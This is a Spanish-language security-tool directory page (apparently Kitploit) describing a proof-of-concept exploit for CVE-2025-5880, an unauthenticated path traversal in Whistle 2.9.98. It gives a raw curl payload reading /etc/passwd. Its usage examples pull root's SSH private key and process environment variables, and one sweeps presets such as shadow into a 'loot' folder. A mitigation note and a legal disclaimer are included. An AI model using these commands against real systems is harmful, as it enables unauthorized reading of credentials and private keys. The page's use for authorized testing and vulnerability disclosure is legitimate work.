Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/yacine-rm/cve-2025-5880-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Exploit de prueba de concepto para una vulnerabilidad de path traversal no autenticada en Whistle v2.9.98.

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-5880 — PoC de Path Traversal en Whistle 2.9.98

Python CVE CWE License

Exploit de prueba de concepto para una vulnerabilidad de path traversal sin autenticación en Whistle v2.9.98.


Resumen de la vulnerabilidad

CampoDetalle
ID CVECVE-2025-5880
CWECWE-22 (Path Traversal)
Software afectadoWhistle ≤ 2.9.98
Endpoint afectado/cgi-bin/sessions/get-temp-file
Vector de ataqueRed — no requiere autenticación
ImpactoLectura arbitraria de archivos en el sistema de archivos del host

El parámetro de consulta filename no se sanitiza antes de usarse para abrir un archivo en disco, lo que permite a un atacante escapar del directorio temporal previsto y leer cualquier archivo al que el proceso de Whistle tenga permisos de acceso (p. ej. /etc/passwd, /root/.ssh/id_rsa).


Inicio rápido

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# No external dependencies
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

Uso

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]

Ejemplos

root@kitploit:~
# Read /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# Grab root's SSH private key
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# Read an arbitrary path
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# Sweep & save all presets
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

PoC en bruto (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

Mitigación

Actualice Whistle a una versión que valide y restrinja el parámetro filename al directorio de archivos temporales previsto. Aplique una normalización de rutas con lista blanca (p. ej. path.resolve + comprobación de prefijo) en el servidor.


Aviso legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos.
El uso no autorizado contra sistemas que no le pertenecen o para los que no tiene permiso explícito para probar es ilegal y poco ético.
El autor no asume ninguna responsabilidad por el mal uso.

Descargar herramienta
FlagDescripción
-u / --urlURL base del objetivo (p. ej. http://192.168.1.10:8899)
-f / --fileRuta de archivo arbitraria para leer
--presetAtajo con nombre: passwd shadow hosts id_rsa …
--sweepIterar automáticamente por todos los presets
-o / --outputGuardar el resultado en un archivo
--save-dirDirectorio donde volcar el botín de --sweep
--timeoutTiempo de espera HTTP en segundos (por defecto 10)